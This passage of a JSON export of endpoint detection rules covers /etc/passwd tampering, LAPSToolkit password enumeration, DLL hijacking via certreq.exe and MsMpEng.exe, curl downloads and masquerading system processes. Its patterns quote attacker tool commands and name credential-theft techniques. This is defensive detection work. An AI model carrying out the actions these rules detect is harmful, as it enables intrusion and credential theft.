--port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_ansible_runner:\n # bash /usr/bin/entrypoint ansible-runner worker --private-data-dir=/runner\n ProcessCommandLine:\n - 'bash /usr/bin/entrypoint ansible-runner worker*'\n - 'bash /usr/local/bin/entrypoint ansible-runner worker*'\n\n exclusion_pwconv:\n ProcessImage: '/usr/sbin/pwconv'\n ProcessParentCommandLine|contains: '/sbin/authconfig'\n\n exclusion_pam:\n ProcessParentCommandLine: '/bin/bash /usr/share/libpam-script/pam_script_ses_open'\n\n exclusion_snap:\n - ProcessImage: '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage: '/usr/lib/snapd/snapd'\n\n exclusion_proxmox:\n ProcessCommandLine: 'pvedaemon'\n ProcessGrandparentCommandLine: 'pvedaemon'\n\n exclusion_buildah:\n ProcessImage: '/usr/bin/buildah'\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65a8fa3a-06de-4ca1-b3dd-64deb561fc8d",
"rule_name": "File /etc/passwd Modified",
"rule_description": "Detects a suspicious attempt to modify /etc/passwd.\nThis file contains every registered user that has access to the system, and can be modified to add new accounts.\nIt is recommended to ensure that both the process modifying this file and the user that requested the creation of a new user are legitimate.\n",
"rule_creation_date": "2023-01-13",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65b180dd-50d1-46e8-ab84-afd8514d89e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084265Z",
"creation_date": "2026-03-23T11:45:34.084267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084272Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/leoloobeek/LAPSToolkit/",
"https://adsecurity.org/?p=1790",
"https://kalilinuxtutorials.com/lapstoolkit-audit-attack/",
"https://attack.mitre.org/techniques/T1087/"
],
"name": "t1087_laps_toolkit.yml",
"content": "title: LAPSToolkit PowerShell Script Executed\nid: 65b180dd-50d1-46e8-ab84-afd8514d89e1\ndescription: |\n Detects the usage of LAPSToolkit, a tool written in PowerShell that leverages PowerView to audit Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS).\n This tool allows attackers to gather significant information about, and identify flaws in, the Active Directory environment they are discovering.\n It is recommended to analyze the execution context of the script (mainly its parent process) to determine its legitimacy.\nreferences:\n - https://github.com/leoloobeek/LAPSToolkit/\n - https://adsecurity.org/?p=1790\n - https://kalilinuxtutorials.com/lapstoolkit-audit-attack/\n - https://attack.mitre.org/techniques/T1087/\ndate: 2024/10/23\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.LAPSToolkit\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n - PowershellScriptPath|endswith: '\\LAPSToolkit.ps1'\n - PowershellCommand|contains|all:\n - 'Find-LAPSDelegatedGroups'\n - 'Get-NetComputer -FullData -Filter \"(ms-mcs-admpwdexpirationtime=*)\" @PSBoundParameters | ForEach-Object'\n - 'Get-NetOU -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData'\n - 'Get-ObjectAcl -Domain $Domain -DomainController $DomainController -Credential $Credential -ResolveGUIDs'\n - 'Write-Verbose \"Retrieving all users and groups to resolve SIDs when using PSCredential\"'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65b180dd-50d1-46e8-ab84-afd8514d89e1",
"rule_name": "LAPSToolkit PowerShell Script Executed",
"rule_description": "Detects the usage of LAPSToolkit, a tool written in PowerShell that leverages PowerView to audit Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS).\nThis tool allows attackers to gather significant information about, and identify flaws in, the Active Directory environment they are discovering.\nIt is recommended to analyze the execution context of the script (mainly its parent process) to determine its legitimacy.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65b72ae8-cc42-4a2b-a7d4-9f6c30bf96b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081849Z",
"creation_date": "2026-03-23T11:45:34.081851Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081856Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_certreq.yml",
"content": "title: Phantom DLL Hijacking via certreq.exe\nid: 65b72ae8-cc42-4a2b-a7d4-9f6c30bf96b2\ndescription: |\n Detects a potential Windows DLL search order hijacking via certreq.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CertReq.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded:\n - '?:\\Windows\\System32\\msfte.dll'\n - '?:\\Windows\\System32\\msTracer.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65b72ae8-cc42-4a2b-a7d4-9f6c30bf96b2",
"rule_name": "Phantom DLL Hijacking via certreq.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via certreq.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65d0c693-d321-45f0-bf8b-7372027471e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622375Z",
"creation_date": "2026-03-23T11:45:34.622377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622381Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/pr0xylife/status/1570064310923304962",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1105_file_download_with_curl_for_windows.yml",
"content": "title: File Downloaded via cURL\nid: 65d0c693-d321-45f0-bf8b-7372027471e3\ndescription: |\n Detects the usage of curl.exe to download a file.\n Attackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\nreferences:\n - https://twitter.com/pr0xylife/status/1570064310923304962\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\n - https://attack.mitre.org/techniques/T1048/\ndate: 2023/12/19\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1048\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_curl:\n - OriginalFileName: 'curl.exe'\n - Image|endswith: '\\curl.exe'\n\n selection_args:\n CommandLine|contains:\n - ' -o'\n - ' /o'\n - ' --output'\n ParentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n GrandparentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_command:\n CommandLine|contains:\n - 'https://*.cashsystemes.com/'\n - 'https://*.mixpanel.com/api'\n - '?:\\Program Files\\Neolane\\NeolaneV'\n - 
'\\SolwareLifePSI\\'\n - 'https://*.enovacom.fr'\n - 'http://*.sage.com.*.ipercast.net/'\n - '--url https://console.fieldwire.net'\n - '-o ?:\\Windows\\TEMP\\SageCoala\\Coala\\'\n - ' --trace-time --connect-timeout '\n - ' https://raw.githubusercontent.com/mon5termatt/medicat_installer/'\n - 'curl.exe -s -o NUL http'\n - ' --user-agent FaceFusion/* --insecure --location --silent '\n - 'curl -e https://installer.medicatusb.com '\n - 'curl -Ls -o nul -w %{url_effective} --connect-timeout 30 --max-time 30 https://mirror.ctan.org'\n - 'curl -fsSL https://claude.ai/install.cmd -o install.cmd'\n - 'curl -fsSL https://storage.googleapis.com/claude-code-dist-'\n - ' -H Connection: close'\n - ' -w %{http_code}'\n - ' -H Authorization: Bearer * -H X-Api-Key:'\n - 'curl -k --connect-timeout 4 -u '\n - 'curl.exe --ca-native --ssl-no-revoke --url https://updaters.designexpress.eu/updaters/'\n - ' https://hydro1.gesdisc.eosdis.nasa.gov/daac-bin/OTF/HTTP_services.cgi'\n\n exclusion_image:\n - Image:\n - '*\\HashiCorp\\Vagrant\\embedded\\bin\\curl.exe'\n - '?:\\ProgramData\\HP\\HP BTO Software\\shared\\EwToolPackage\\EwToolPackageCurl\\curl\\curl.exe'\n - '?:\\soft_web\\curl\\bin\\curl.exe'\n - '?:\\tradexpress5\\bin\\curl.exe'\n - '*\\git\\mingw64\\bin\\curl.exe'\n - ParentImage: '?:\\Users\\\\*\\AppData\\Roaming\\TinyTeX\\tlpkg\\tlperl\\bin\\perl.exe'\n - GrandparentImage: '?:\\ProgramData\\3CXSBC\\3cxsbc.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '\\Talend?\\'\n - '?:\\Program Files\\Zulu\\zulu-*\\bin\\java.exe'\n - '|?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n - '|?:\\VTOM\\ABM\\BIN\\bdaemon.exe'\n - '|?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n\n exclusion_fiery:\n - Image: '?:\\Users\\\\*\\AppData\\Roaming\\Fiery Software Manager\\extract\\\\*\\FSM\\curl.exe'\n - ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\RarSFX*\\FSM\\Fiery Software Manager.exe'\n\n exclusion_archicad:\n - Image|endswith: 
'\\GRAPHISOFT\\Archicad*\\curl.exe'\n - CommandLine|contains: '\\archicad\\curl.exe --cacert '\n ParentImage|endswith:\n - '\\Archicad.exe'\n - '\\UsageLogSender.exe'\n\n exclusion_git:\n ParentCommandLine|endswith: '\\git-update-git-for-windows --quiet --gui'\n\n exclusion_dell:\n CurrentDirectory: '?:\\Program Files\\Dell\\Dell Repository Manager\\'\n\n exclusion_fusioninventory:\n ParentCommandLine: 'start /wait cmd /c ?:\\Windows\\TEMP\\fusioninventory*.bat'\n\n exclusion_moodle:\n CommandLine|contains|all:\n - 'moodle'\n - '/admin/cron.php'\n\n exclusion_domotz:\n Image|endswith: '\\domotz_curl.exe'\n CommandLine|contains:\n - 'https://portal.domotz.com'\n - '?:\\Windows\\TEMP\\local-domotz-packages.json'\n\n exclusion_perl_install:\n ParentCommandLine|startswith: '?:\\users\\\\*\\appdata\\local\\temp\\\\*tmp\\install-tl-*\\tlpkg\\tlperl\\bin\\perl.exe'\n\n exclusion_share:\n Image|startswith: '\\\\\\\\'\n\n exclusion_llm_autokey:\n ParentImage|endswith: '\\LLM AutoHotkey Assistant.exe'\n CommandLine|contains: '-H HTTP-Referer: https://github.com/kdalanon/LLM-AutoHotkey-Assistant '\n\n exclusion_miniconda:\n GrandparentCommandLine|contains: '?:\\ProgramData\\miniconda3\\Scripts\\activate.bat ?:\\ProgramData\\miniconda3'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65d0c693-d321-45f0-bf8b-7372027471e3",
"rule_name": "File Downloaded via cURL",
"rule_description": "Detects the usage of curl.exe to download a file.\nAttackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\n",
"rule_creation_date": "2023-12-19",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048",
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65d88092-894b-431b-aa5d-70bcd00ea324",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085254Z",
"creation_date": "2026-03-23T11:45:34.085256Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/",
"https://attack.mitre.org/techniques/T1036/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1036_suspicious_msmpeng.yml",
"content": "title: Suspicious MsMpEng.exe Execution\nid: 65d88092-894b-431b-aa5d-70bcd00ea324\ndescription: |\n Detects an execution of the MsMpEng.exe binary with an unexpected parent or integrity level.\n This is likely an attempt by an attacker to either perform a DLL sideloading attack by placing a malicious mpsvc.dll into the same directory or to start MsMpEng.exe via process tampering to perform malicious actions under the legitimate Microsoft-signed binary.\n It is recommended to analyze the actions taken by MsMpEng after this alert and to look for any unsigned or suspicious DLLs being loaded by it via telemetry.\nreferences:\n - https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/\n - https://attack.mitre.org/techniques/T1036/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2021/07/16\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - attack.t1574.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Image|endswith: '\\MsMpEng.exe'\n - OriginalFileName: 'MsMpEng.exe'\n\n filter_legitimate_parent:\n ParentImage: '?:\\Windows\\System32\\services.exe'\n\n filter_legitimate_integrity_level:\n IntegrityLevel: 'System'\n\n exclusion_parent_unknown:\n # In case the agent doesn't know the parent of this process.\n ParentImage:\n - null\n - ''\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65d88092-894b-431b-aa5d-70bcd00ea324",
"rule_name": "Suspicious MsMpEng.exe Execution",
"rule_description": "Detects an execution of the MsMpEng.exe binary with an unexpected parent or integrity level.\nThis is likely an attempt by an attacker to either perform a DLL sideloading attack by placing a malicious mpsvc.dll into the same directory or to start MsMpEng.exe via process tampering to perform malicious actions under the legitimate Microsoft-signed binary.\nIt is recommended to analyze the actions taken by MsMpEng after this alert and to look for any unsigned or suspicious DLLs being loaded by it via telemetry.\n",
"rule_creation_date": "2021-07-16",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65f9250c-0a9d-4f2d-bfe1-cc6b130418aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627451Z",
"creation_date": "2026-03-23T11:45:34.627454Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627458Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1036_suspicious_process_parent.yml",
"content": "title: Suspicious Parent Process for Windows Common Process\nid: 65f9250c-0a9d-4f2d-bfe1-cc6b130418aa\ndescription: |\n Detects the execution of a system process with an unexpected parent process.\n This is likely an attempt at masquerading as a system process and it is often the result of a process injection.\n It is recommended to investigate the child and parent processes to look for malicious content, actions, or signs of injection.\nreferences:\n - https://attack.mitre.org/techniques/T1036/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/05/25\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_svchost:\n Image|endswith: '\\svchost.exe'\n filter_parent_svchost:\n ParentImage|endswith:\n - '\\MRT.exe'\n - '\\MsMpEng.exe'\n - '\\services.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\svchost.exe'\n\n selection_spoolsv:\n Image|endswith: '\\spoolsv.exe'\n filter_parent_spoolsv:\n ParentImage|endswith:\n - '\\services.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\spoolsv.exe'\n\n selection_taskhost:\n Image|endswith:\n - '\\taskhost.exe'\n - '\\taskhostw.exe'\n filter_parent_taskhost:\n ParentImage|endswith:\n - '\\services.exe'\n - '\\svchost.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\taskhostw.exe'\n - '\\taskhost.exe'\n\n selection_userinit:\n Image|endswith: '\\userinit.exe'\n filter_parent_userinit:\n ParentImage|endswith:\n - '\\dwm.exe'\n - '\\winlogon.exe'\n\n selection_services:\n Image|endswith: '\\services.exe'\n 
filter_parent_services:\n ParentImage|endswith:\n - '\\wininit.exe'\n # Can happen with a user mistake, as Windows 10 search results do not always return \"services.msc\" when asking for \"Services\"\n - '\\explorer.exe'\n\n selection_logonui:\n Image|endswith: '\\LogonUI.exe'\n filter_parent_logonui:\n ParentImage|endswith:\n - '\\wininit.exe'\n - '\\winlogon.exe'\n - '\\logonUI.exe'\n\n selection_lsass:\n Image|endswith: '\\lsass.exe'\n filter_parent_lsass:\n ParentImage|endswith: '\\wininit.exe'\n filter_lsass_werfault:\n #CommandLine: ''\n ParentImage|endswith: '\\lsass.exe'\n GrandparentImage|endswith: '\\wininit.exe'\n\n selection_winlogon:\n Image|endswith: '\\winlogon.exe'\n filter_parent_winlogon:\n ParentImage|endswith:\n - '\\smss.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\winlogon.exe'\n\n selection_wininit:\n Image|endswith: '\\wininit.exe'\n filter_parent_wininit:\n ParentImage|endswith:\n - '\\smss.exe'\n - '\\svchost.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\wininit.exe'\n\n selection_csrss:\n Image|endswith: '\\csrss.exe'\n filter_parent_csrss:\n - ParentImage|endswith:\n - '\\smss.exe'\n - '\\svchost.exe'\n # Since Windows 10, can happen via process cloning for Werfault process dump.\n - '\\csrss.exe'\n # This will happen after a System reset or reinstall\n - ParentImage: '?:\\Windows\\explorer.exe'\n Image: '?:\\$SysReset\\Scratch\\csrss.exe'\n\n selection_smss:\n Image|endswith: '\\smss.exe'\n filter_parent_smss:\n ParentImage:\n - '*\\smss.exe'\n - 'System'\n - '?:\\WINDOWS\\system32\\ntoskrnl.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n selection_fontdrvhost:\n Image|endswith: '\\fontdrvhost.exe'\n filter_parent_fontdrvhost:\n ParentImage|endswith:\n - '\\wininit.exe'\n - '\\winlogon.exe'\n - '\\fontdrvhost.exe'\n\n selection_dwm:\n Image|endswith: '\\dwm.exe'\n filter_parent_dwm:\n ParentImage|endswith:\n - '\\winlogon.exe'\n - '\\svchost.exe'\n - 
'\\wininit.exe'\n - '\\dwm.exe' # in case of crash, dwm respawns itself\n\n # This is handled by the rule 2fe027bc-7a3c-412a-9493-8581215d5157\n exclusion_absolute_sofware:\n ParentImage:\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n - '?:\\Windows\\System32\\rpcnetp.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_unknown_parent:\n # In case the agent doesn't know the parent of this process.\n ParentImage:\n - null\n - \"\"\n\n exclusion_ashookdevice:\n Image: '?:\\Program Files (x86)\\ASUS\\ASUS Business Manager\\DeviceLock\\svchost.exe'\n ParentImage: '?:\\Windows\\SysWOW64\\AsHookDevice.exe'\n\n # Exclusion for User Lock (https://www.isdecisions.com/products/userlock/)\n exclusion_parent_userlock:\n ParentImage: '?:\\Windows\\SysWOW64\\ULAgentExe.exe'\n\n exclusion_ksuserinit:\n # parent is ksuserinit (613ceaec88f80e7a32c3562a419eb58663ca289cfc3873f1ebe7e895fad46063)\n Image: '?:\\Windows\\System32\\userinit.exe'\n ParentImage: '?:\\Windows\\System32\\KUsrInit.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\winlogon.exe'\n - null\n - \"\"\n\n exclusion_cliaca2kp:\n Image: '?:\\Windows\\System32\\userinit.exe'\n ParentImage: '?:\\Windows\\System32\\Cliaca2kp.exe'\n GrandparentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_zonecentral:\n Image: '?:\\Windows\\System32\\userinit.exe'\n ParentCommandLine: '?:\\Program Files\\Prim?X\\ZoneCentral\\zcuserinit.exe -cryptlogon'\n GrandparentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_asus:\n Image: '?:\\Program Files (x86)\\ASUS\\ASUS Manager\\USB Lock\\svchost.exe'\n ParentImage:\n - '?:\\Windows\\SysWOW64\\AsHookDevice.exe'\n - '?:\\Windows\\System32\\taskeng.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\services.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_graphon:\n Image:\n - '?:\\Windows\\System32\\fontdrvhost.exe'\n - '?:\\Windows\\System32\\csrss.exe'\n ParentImage|endswith:\n - '\\Logon.exe'\n - '\\aps.aps'\n ProcessParentSigned: 
'true'\n ProcessParentSignature: 'GraphOn Corporation'\n\n exclusion_services:\n Image: '?:\\Windows\\System32\\services.exe'\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_parentimage:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\CtxExplorerLauncher.exe'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\CitrixUserInit.exe'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\tracksvc.exe'\n - '?:\\Program Files (x86)\\Smiths Detection\\HazMatID Elite\\HazMatIDEliteTaskBar.exe'\n - '?:\\Program Files\\COMODO\\COMODO Internet Security\\cmdvirth.exe'\n - '?:\\Program Files\\Nexthink\\Collector\\BSM\\nxtbsm.exe'\n\n exclusion_lfsagent:\n Image|endswith: '\\services.exe'\n Signed: 'true'\n Signature: 'Lepide Software Private Limited'\n\n exclusion_csrss:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows 